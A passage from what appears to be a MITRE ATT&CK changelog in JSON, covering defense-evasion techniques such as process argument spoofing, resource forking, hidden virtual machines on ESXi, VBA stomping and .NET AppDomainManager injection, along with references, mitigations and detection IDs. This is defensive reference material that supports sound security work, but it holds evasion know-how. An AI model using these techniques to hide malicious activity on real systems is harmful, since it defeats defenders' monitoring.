                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 20:24:50.745000+00:00\", \"old_value\": \"2025-10-24 17:49:35.944000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.2\"}}, \"iterable_item_removed\": {\"root['external_references'][7]\": {\"source_name\": \"Oddvar Moe ADS2 Apr 2018\", \"description\": \"Moe, O. (2018, April 11). Putting Data in Alternate Data Streams and How to Execute It - Part 2. Retrieved June 30, 2018.\", \"url\": \"https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/\"}, \"root['external_references'][8]\": {\"source_name\": \"Oddvar Moe ADS1 Jan 2018\", \"description\": \"Moe, O. (2018, January 14). Putting Data in Alternate Data Streams and How to Execute It. Retrieved June 30, 2018.\", \"url\": \"https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/\"}, \"root['external_references'][9]\": {\"source_name\": \"Symantec ADS May 2009\", \"description\": \"Pravs. (2009, May 25). What you need to know about alternate data streams in windows? Is your Data secure? Can you restore that?. Retrieved March 21, 2018.\", \"url\": \"https://www.symantec.com/connect/articles/what-you-need-know-about-alternate-data-streams-windows-your-data-secure-can-you-restore\"}}}",
                    "previous_version": "1.2",
                    "version_change": "1.2 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1022: Restrict File and Directory Permissions"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0432: Detection Strategy for NTFS File Attribute Abuse (ADS/EAs)"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--ffe59ad3-ad9b-4b9f-b74f-5beb3c309dc1",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-11-19 14:13:11.335000+00:00",
                    "modified": "2026-04-15 20:25:25.946000+00:00",
                    "name": "Process Argument Spoofing",
                    "description": "Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.(Citation: Microsoft PEB 2021)(Citation: Xpn Argue Like Cobalt 2019)\n\nAdversaries may manipulate a process PEB to evade defenses. For example, [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) can be abused to spawn a process in a suspended state with benign arguments. After the process is spawned and the PEB is initialized (and process information is potentially logged by tools/sensors), adversaries may override the PEB to modify the command-line arguments (ex: using the [Native API](https://attack.mitre.org/techniques/T1106) <code>WriteProcessMemory()</code> function) then resume process execution with malicious arguments.(Citation: Cobalt Strike Arguments 2019)(Citation: Xpn Argue Like Cobalt 2019)(Citation: Nviso Spoof Command Line 2020)\n\nAdversaries may also execute a process with malicious command-line arguments then patch the memory with benign arguments that may bypass subsequent process memory analysis.(Citation: FireEye FiveHands April 2021)\n\nThis behavior may also be combined with other tricks (such as [Parent PID Spoofing](https://attack.mitre.org/techniques/T1134/004)) to manipulate or further evade process-based detections.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1564/010",
                            "external_id": "T1564.010"
                        },
                        {
                            "source_name": "Xpn Argue Like Cobalt 2019",
                            "description": "Chester, A. (2019, January 28). How to Argue like Cobalt Strike. Retrieved November 19, 2021.",
                            "url": "https://blog.xpnsec.com/how-to-argue-like-cobalt-strike/"
                        },
                        {
                            "source_name": "Nviso Spoof Command Line 2020",
                            "description": "Daman, R. (2020, February 4). The return of the spoof part 2: Command line spoofing. Retrieved November 19, 2021.",
                            "url": "https://blog.nviso.eu/2020/02/04/the-return-of-the-spoof-part-2-command-line-spoofing/"
                        },
                        {
                            "source_name": "FireEye FiveHands April 2021",
                            "description": "McLellan, T.  and Moore, J. et al. (2021, April 29). UNC2447 SOMBRAT and FIVEHANDS Ransomware: A Sophisticated Financial Threat. Retrieved June 2, 2021.",
                            "url": "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html"
                        },
                        {
                            "source_name": "Microsoft PEB 2021",
                            "description": "Microsoft. (2021, October 6). PEB structure (winternl.h). Retrieved November 19, 2021.",
                            "url": "https://docs.microsoft.com/en-us/windows/win32/api/winternl/ns-winternl-peb"
                        },
                        {
                            "source_name": "Cobalt Strike Arguments 2019",
                            "description": "Mudge, R. (2019, January 2). https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/. Retrieved November 19, 2021.",
                            "url": "https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 20:25:25.946000+00:00\", \"old_value\": \"2025-10-24 17:49:40.325000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.1\"}}, \"iterable_item_removed\": {\"root['external_references'][6]\": {\"source_name\": \"Mandiant Endpoint Evading 2019\", \"description\": \"Pena, E., Erikson, C. (2019, October 10). Staying Hidden on the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.\", \"url\": \"https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode\"}}}",
                    "previous_version": "1.1",
                    "version_change": "1.1 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0045: Detection Strategy for Process Argument Spoofing on Windows"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--b22e5153-ac28-4cc6-865c-2054e36285cb",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-12 20:02:31.866000+00:00",
                    "modified": "2026-04-15 20:25:32.891000+00:00",
                    "name": "Resource Forking",
                    "description": "Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file\u2019s extended attributes, using <code>ls -l@</code> or <code>xattr -l</code> commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the <code>/Resources</code> folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes)\n\nAdversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.(Citation: sentinellabs resource named fork 2020)(Citation: tau bundlore erika noerenberg 2020)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1564/009",
                            "external_id": "T1564.009"
                        },
                        {
                            "source_name": "tau bundlore erika noerenberg 2020",
                            "description": "Erika Noerenberg. (2020, June 29). TAU Threat Analysis: Bundlore (macOS) mm-install-macos. Retrieved October 12, 2021.",
                            "url": "https://blogs.vmware.com/security/2020/06/tau-threat-analysis-bundlore-macos-mm-install-macos.html"
                        },
                        {
                            "source_name": "Resource and Data Forks",
                            "description": "Flylib. (n.d.). Identifying Resource and Data Forks. Retrieved October 12, 2021.",
                            "url": "https://flylib.com/books/en/4.395.1.192/1/"
                        },
                        {
                            "source_name": "ELC Extended Attributes",
                            "description": "Howard Oakley. (2020, October 24). There's more to files than data: Extended Attributes. Retrieved October 12, 2021.",
                            "url": "https://eclecticlight.co/2020/10/24/theres-more-to-files-than-data-extended-attributes/"
                        },
                        {
                            "source_name": "sentinellabs resource named fork 2020",
                            "description": "Phil Stokes. (2020, November 5). Resourceful macOS Malware Hides in Named Fork. Retrieved October 12, 2021.",
                            "url": "https://www.sentinelone.com/labs/resourceful-macos-malware-hides-in-named-fork/"
                        },
                        {
                            "source_name": "macOS Hierarchical File System Overview",
                            "description": "Tenon. (n.d.). Retrieved October 12, 2021.",
                            "url": "http://tenon.com/products/codebuilder/User_Guide/6_File_Systems.html#anchor520553"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Ivan Sinyakov",
                        "Jaron Bradley @jbradley89"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "macOS"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 20:25:32.891000+00:00\", \"old_value\": \"2025-10-24 17:49:14.736000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.1\"}}}",
                    "previous_version": "1.1",
                    "version_change": "1.1 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1013: Application Developer Guidance"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0584: Detection Strategy for Resource Forking on macOS"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--b5327dd1-6bf9-4785-a199-25bcbd1f4a9d",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-06-29 15:36:41.535000+00:00",
                    "modified": "2026-04-15 20:26:04.116000+00:00",
                    "name": "Run Virtual Instance",
                    "description": "Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance.(Citation: CyberCX Akira Ransomware) Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)\n\nAdversaries may utilize native support for virtualization (ex: Hyper-V), deploy lightweight emulators (ex: QEMU), or drop the necessary files to run a virtual instance (ex: VirtualBox binaries).(Citation: Securonix CronTrap 2024) After running a virtual instance, adversaries may create a shared folder between the guest and host with permissions that enable the virtual instance to interact with the host file system.(Citation: Sophos Ragnar May 2020)\n\nThreat actors may also leverage temporary virtualized environments such as the Windows Sandbox, which supports the use of `.wsb` configuration files for defining execution parameters. For example, the `<MappedFolder>` property supports the creation of a shared folder, while the `<LogonCommand>` property allows the specification of a payload.(Citation: ESET MirrorFace 2025)(Citation: ITOCHU Hack the Sandbox)(Citation: ITOCHU Sandbox PPT)\n\nIn VMWare environments, adversaries may leverage the vCenter console to create new virtual machines. However, they may also create virtual machines directly on ESXi servers by running a valid `.vmx` file with the `/bin/vmx` utility. Adding this command to `/etc/rc.local.d/local.sh` (i.e., [RC Scripts](https://attack.mitre.org/techniques/T1037/004)) will cause the VM to persistently restart.(Citation: vNinja Rogue VMs 2024) Creating a VM this way prevents it from appearing in the vCenter console or in the output to the `vim-cmd vmsvc/getallvms` command on the ESXi server, thereby hiding it from typical administrative activities.(Citation: MITRE VMware Abuse 2024)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1564/006",
                            "external_id": "T1564.006"
                        },
                        {
                            "source_name": "ESET MirrorFace 2025",
                            "description": " Dominik Breitenbacher. (2025, March 18). Operation AkaiRy\u016b: MirrorFace invites Europe to Expo 2025 and revives ANEL backdoor. Retrieved May 22, 2025.",
                            "url": "https://www.welivesecurity.com/en/eset-research/operation-akairyu-mirrorface-invites-europe-expo-2025-revives-anel-backdoor/"
                        },
                        {
                            "source_name": "vNinja Rogue VMs 2024",
                            "description": "Christian Mohn. (2024, November 11). Beware Of The Rogue VMs!. Retrieved March 26, 2025.",
                            "url": "https://vninja.net/2024/11/11/beware-of-the-rogue-vms/"
                        },
                        {
                            "source_name": "SingHealth Breach Jan 2019",
                            "description": "Committee of Inquiry into the Cyber Attack on SingHealth. (2019, January 10). Public Report of the Committee of Inquiry into the Cyber Attack on Singapore Health Services Private Limited's Patient Database. Retrieved June 29, 2020.",
                            "url": "https://www.mci.gov.sg/-/media/mcicorp/doc/report-of-the-coi-into-the-cyber-attack-on-singhealth-10-jan-2019.ashx"
                        },
                        {
                            "source_name": "CyberCX Akira Ransomware",
                            "description": "CyberCX. (2023, September 15). Weaponising VMs to bypass EDR \u2013 Akira ransomware. Retrieved April 4, 2025.",
                            "url": "https://cybercx.com.au/blog/akira-ransomware/"
                        },
                        {
                            "source_name": "Securonix CronTrap 2024",
                            "description": "Den Iuzvyk and Tim Peck. (2024, November 4). CRON#TRAP: Emulated Linux Environments as the Latest Tactic in Malware Staging. Retrieved May 22, 2025.",
                            "url": "https://www.securonix.com/blog/crontrap-emulated-linux-environments-as-the-latest-tactic-in-malware-staging/"
                        },
                        {
                            "source_name": "ITOCHU Hack the Sandbox",
                            "description": "ITOCHU Cyber & Intelligence Inc.. (2025, March 12). Hack The Sandbox: Unveiling the Truth Behind Disappearing Artifacts. Retrieved November 5, 2025.",
                            "url": "https://blog-en.itochuci.co.jp/entry/2025/03/12/140000"
                        },
                        {
                            "source_name": "ITOCHU Sandbox PPT",
                            "description": "ITOCHU Cyber & Intelligence Inc.. (n.d.). Hack The Sandbox: Unveiling the Truth Behind Disappearing Artifacts. Retrieved November 5, 2025.",
                            "url": "https://jsac.jpcert.or.jp/archive/2025/pdf/JSAC2025_2_9_kamekawa_sasada_niwa_en.pdf"
                        },
                        {
                            "source_name": "MITRE VMware Abuse 2024",
                            "description": "Lex Crumpton. (2024, May 22). Infiltrating Defenses: Abusing VMware in MITRE\u2019s Cyber Intrusion. Retrieved March 26, 2025.",
                            "url": "https://medium.com/mitre-engenuity/infiltrating-defenses-abusing-vmware-in-mitres-cyber-intrusion-4ea647b83f5b"
                        },
                        {
                            "source_name": "Sophos Ragnar May 2020",
                            "description": "SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020.",
                            "url": "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Enis Aksu",
                        "Janantha Marasinghe",
                        "Jiraput Thamsongkrah",
                        "Johann Rehberger",
                        "Menachem Shafran, XM Cyber",
                        "Natthawut Saexu",
                        "Purinut Wongwaiwuttiguldej",
                        "Satoshi Kamekawa, ITOCHU Cyber & Intelligence Inc.",
                        "Shuhei Sasada, ITOCHU Cyber & Intelligence Inc.",
                        "Yusuke Niwa, ITOCHU Cyber & Intelligence Inc."
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "ESXi",
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 20:26:04.116000+00:00\", \"old_value\": \"2025-11-05 15:22:05.269000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.3\"}}}",
                    "previous_version": "1.3",
                    "version_change": "1.3 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1038: Execution Prevention",
                            "M1042: Disable or Remove Feature or Program",
                            "M1047: Audit"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0321: Detection Strategy for Hidden Virtual Instance Execution"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--c898c4b5-bf36-4e6e-a4ad-5b8c4c13e35b",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-09-17 12:51:40.845000+00:00",
                    "modified": "2026-04-15 20:26:09.220000+00:00",
                    "name": "VBA Stomping",
                    "description": "Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)\n\nMS Office documents with embedded VBA content store source code inside of module streams. Each module stream has a <code>PerformanceCache</code> that stores a separate compiled version of the VBA source code known as p-code. The p-code is executed when the MS Office version specified in the <code>_VBA_PROJECT</code> stream (which contains the version-dependent description of the VBA project) matches the version of the host MS Office application.(Citation: Evil Clippy May 2019)(Citation: Microsoft _VBA_PROJECT Stream)\n\nAn adversary may hide malicious VBA code by overwriting the VBA source code location with zero\u2019s, benign code, or random bytes while leaving the previously compiled malicious p-code. Tools that scan for malicious VBA source code may be bypassed as the unwanted code is hidden in the compiled p-code. If the VBA source code is removed, some tools might even think that there are no macros present. If there is a version match between the <code>_VBA_PROJECT</code> stream and host MS Office application, the p-code will be executed, otherwise the benign VBA source code will be decompressed and recompiled to p-code, thus removing malicious p-code and potentially bypassing dynamic analysis.(Citation: Walmart Roberts Oct 2018)(Citation: FireEye VBA stomp Feb 2020)(Citation: pcodedmp Bontchev)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1564/007",
                            "external_id": "T1564.007"
                        },
                        {
                            "source_name": "pcodedmp Bontchev",
                            "description": "Bontchev, V. (2019, July 30). pcodedmp.py - A VBA p-code disassembler. Retrieved September 17, 2020.",
                            "url": "https://github.com/bontchev/pcodedmp"
                        },
                        {
                            "source_name": "FireEye VBA stomp Feb 2020",
                            "description": "Cole, R., Moore, A., Stark, G., Stancill, B. (2020, February 5). STOMP 2 DIS: Brilliance in the (Visual) Basics. Retrieved September 17, 2020.",
                            "url": "https://www.fireeye.com/blog/threat-research/2020/01/stomp-2-dis-brilliance-in-the-visual-basics.html"
                        },
                        {
                            "source_name": "Evil Clippy May 2019",
                            "description": "Hegt, S. (2019, May 5). Evil Clippy: MS Office maldoc assistant. Retrieved September 17, 2020.",
                            "url": "https://outflank.nl/blog/2019/05/05/evil-clippy-ms-office-maldoc-assistant/"
                        },
                        {
                            "source_name": "Microsoft _VBA_PROJECT Stream",
                            "description": "Microsoft. (2020, February 19). 2.3.4.1 _VBA_PROJECT Stream: Version Dependent Project Information. Retrieved September 18, 2020.",
                            "url": "https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-ovba/ef7087ac-3974-4452-aab2-7dba2214d239"
                        },
                        {
                            "source_name": "Walmart Roberts Oct 2018",
                            "description": "Sayre, K., Ogden, H., Roberts, C. (2018, October 10). VBA Stomping \u2014 Advanced Maldoc Techniques. Retrieved September 17, 2020.",
                            "url": "https://medium.com/walmartglobaltech/vba-stomping-advanced-maldoc-techniques-612c484ab278"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Rick Cole, Mandiant"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 20:26:09.220000+00:00\", \"old_value\": \"2025-10-24 17:49:22.623000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.2\"}}, \"iterable_item_removed\": {\"root['external_references'][6]\": {\"source_name\": \"oletools toolkit\", \"description\": \"decalage2. (2019, December 3). python-oletools. Retrieved September 18, 2020.\", \"url\": \"https://github.com/decalage2/oletools\"}}}",
                    "previous_version": "1.2",
                    "version_change": "1.2 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1042: Disable or Remove Feature or Program"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0012: Detection Strategy for VBA Stomping"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-03-12 20:38:12.465000+00:00",
                    "modified": "2026-04-20 21:18:17.156000+00:00",
                    "name": "Hijack Execution Flow",
                    "description": "Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution.\n\nThere are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "execution"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1574",
                            "external_id": "T1574"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_remote_support": false,
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_remote_support']\": false}, \"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-20 21:18:17.156000+00:00\", \"old_value\": \"2025-10-24 17:49:13.820000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.3\"}, \"root['kill_chain_phases'][1]\": {\"new_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"execution\"}, \"old_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"privilege-escalation\"}}, \"root['kill_chain_phases'][0]\": {\"new_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"stealth\"}, \"old_value\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"persistence\"}}}, \"iterable_item_removed\": {\"root['kill_chain_phases'][2]\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"defense-evasion\"}, \"root['external_references'][1]\": {\"source_name\": \"Autoruns for Windows\", \"description\": \"Mark Russinovich. (2019, June 28). Autoruns for Windows v13.96. Retrieved March 13, 2020.\", \"url\": \"https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns\"}}}",
                    "previous_version": "1.3",
                    "version_change": "1.3 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1013: Application Developer Guidance",
                            "M1018: User Account Management",
                            "M1022: Restrict File and Directory Permissions",
                            "M1024: Restrict Registry Permissions",
                            "M1038: Execution Prevention",
                            "M1040: Behavior Prevention on Endpoint",
                            "M1044: Restrict Library Loading",
                            "M1047: Audit",
                            "M1051: Update Software",
                            "M1052: User Account Control"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0218: Detection Strategy for Hijack Execution Flow across OS platforms."
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--356662f7-e315-4759-86c9-6214e2a50ff8",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2024-03-28 15:36:34.141000+00:00",
                    "modified": "2026-04-15 22:57:09.601000+00:00",
                    "name": "AppDomainManager",
                    "description": "Adversaries may execute their own malicious payloads by hijacking how the .NET `AppDomainManager` loads assemblies. The .NET framework uses the `AppDomainManager` class to create and manage one or more isolated runtime environments (called application domains) inside a process to host the execution of .NET applications. Assemblies (`.exe` or `.dll` binaries compiled to run as .NET code) may be loaded into an application domain as executable code.(Citation: Microsoft App Domains) \n\nKnown as \"AppDomainManager injection,\" adversaries may execute arbitrary code by hijacking how .NET applications load assemblies. For example, malware may create a custom application domain inside a target process to load and execute an arbitrary assembly. Alternatively, configuration files (`.config`) or process environment variables that define .NET runtime settings may be tampered with to instruct otherwise benign .NET applications to load a malicious assembly (identified by name) into the target process.(Citation: PenTestLabs AppDomainManagerInject)(Citation: PwC Yellow Liderc)(Citation: Rapid7 AppDomain Manager Injection)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "execution"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1574/014",
                            "external_id": "T1574.014"
                        },
                        {
                            "source_name": "PenTestLabs AppDomainManagerInject",
                            "description": "Administrator. (2020, May 26). APPDOMAINMANAGER INJECTION AND DETECTION. Retrieved March 28, 2024.",
                            "url": "https://pentestlaboratories.com/2020/05/26/appdomainmanager-injection-and-detection/"
                        },
                        {
                            "source_name": "Microsoft App Domains",
                            "description": "Microsoft. (2021, September 15). Application domains. Retrieved March 28, 2024.",
                            "url": "https://learn.microsoft.com/dotnet/framework/app-domains/application-domains"
                        },
                        {
                            "source_name": "PwC Yellow Liderc",
